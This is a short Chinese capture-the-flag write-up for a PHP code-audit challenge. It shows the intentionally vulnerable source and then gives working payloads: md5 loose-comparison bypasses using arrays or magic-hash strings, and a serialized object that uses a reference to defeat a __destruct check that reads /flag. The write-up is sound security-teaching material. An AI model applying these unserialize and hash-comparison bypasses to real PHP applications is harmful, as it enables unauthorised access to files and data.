知识点:代码审计,php反序列化
<?php
/**
* Created by PhpStorm.
* User: jinzhao
* Date: 2019/10/6
* Time: 8:04 PM
*/
highlight_file(__FILE__);
class BUU {
public $correct = "";
public $input = "";
public function __destruct() {
try {
$this->correct = base64_encode(uniqid());
if($this->correct === $this->input) {
echo file_get_contents("/flag");
}
} catch (Exception $e) {
}
}
}
if($_GET['pleaseget'] === '1') {
if($_POST['pleasepost'] === '2') {
if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
unserialize($_POST['obj']);
}
}
}
其中GET和POST传参都容易处理,第三层的md5弱碰撞可以使用数组绕过或者==弱比较绕过
md51[]=1&md52[]=2
最后一步php反序列化需要满足$this->correct === $this->input
因为每次都会执行$this->correct = base64_encode(uniqid());,所以我们不能将input设为具体的值,而是在序列化执行,令input=&correct
序列化对象
<?php
class BUU{
public $correct = "";
public $input = "";
}
$a = new BUU();
$a->input = &$a->correct;
echo serialize($a);
结果
O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}
payload:
GET传参
?pleaseget=1
POST传参
pleasepost=2&md51[]=1&md52[]=2&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}
或者
pleasepost=2&md51=QNKCDZO&md52=s155964671a&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}
或者利用php弱比较的特性传参
md51=QNKCDZO&md52=s155964671a
